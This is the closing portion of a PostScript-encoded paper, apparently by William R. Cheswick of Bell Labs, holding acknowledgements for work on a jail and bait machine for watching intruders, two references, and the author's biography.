y(ports)e(to)h(detect)h(unusual)e(scanners.)0 1755 y Fg(9.)21
b(Acknowledgements)83 1851 y Ff(A)9 b(number)g(of)g(people)f(worked)h(very)g
(hard)g(on)f(this)g(problem.)15 b(They)9 b(include)f(Stephen)h(Hansen,)h(T)m
(odd)f(Atkins,)f(and)h(others)g(at)0 1901 y(Stanford,)h(T)m(sutomu)f
(Shimomura)h(of)g(Los)g(Alamos,)h(and)f(W)n(ietse)h(V)-5 b(enema)12
b(of)d(Eindhoven)g(University)m(.)14 b(Locally)m(,)d(Paul)f(Glick)f(and)0
1951 y(Diana)i(D'Angelo)e(worked)h(on)g(the)g(Jail.)15 b(Steve)c(Bellovin)e
(provided)g(numerous)h(insights,)f(traps,)h(and)h(a)g(dedicated)f(bait)g
(machine.)0 2000 y(Jim)g(Reeds)h(of)o(fered)g(a)f(number)h(of)f(helpful)f
(suggestions.)0 2130 y Fg(10.)21 b(Refer)o(ences)173 2222 y
Ff([1])f(Cheswick,)10 b(W)l(.R.)g Fe(The)g(Design)g(of)f(a)g(Secur)n(e)i
(Internet)e(Gateway)n(.)15 b Ff(USENIX)9 b(Summer)i(Conference)f
(Proceedings,)242 2271 y(June)h(1990.)173 2348 y([2])20 b(Stoll,)9
b(C.)h Fe(The)h(Cuckoo')-5 b(s)10 b(Egg:)k(T)n(racking)c(a)g(Spy)g(Thr)n
(ough)g(the)g(Maze)g(of)f(Computer)h(Espionage.)k Ff(Pocket)d(Books,)242
2398 y(New)g(Y)l(ork,)f(1990.)0 2492 y(W)n(illiam)h(R.)h(Cheswick)f(has)h
(been)g(a)g(member)h(of)e(the)h(technical)f(staf)o(f)h(in)f(the)h(Computer)e
(Science)j(Research)g(division)c(of)j(A)-5 b(T&T)0 2542 y(Bell)10
b(Laboratories)h(since)g(1987.)17 b(He)11 b(has)g(worked)g(on)f(networking,)g
(system)h(administration,)f(and)h(security)m(.)17 b(Previously)9
b(he)i(was)0 2591 y(a)g(system)f(programmer)h(for)e(several)i(university)d
(computer)i(centers,)h(a)g(programmer)f(and)g(electrical)h(engineer)f(for)f
(the)h(American)0 2641 y(Newspapers)g(Publishing)d(Association)h(Research)i
(Institute,)e(and)h(a)h(contractor)f(to)f(the)h(Navy)m(.)15
b(Bill)8 b(has)h(an)g(under)o(graduate)g(degree)0 2691 y(in)h(Fundamental)g
(Science)h(from)f(Lehigh)g(University)m(.)p eop
%%Trailer
end
userdict /end-hook known{end-hook}if
%%EOF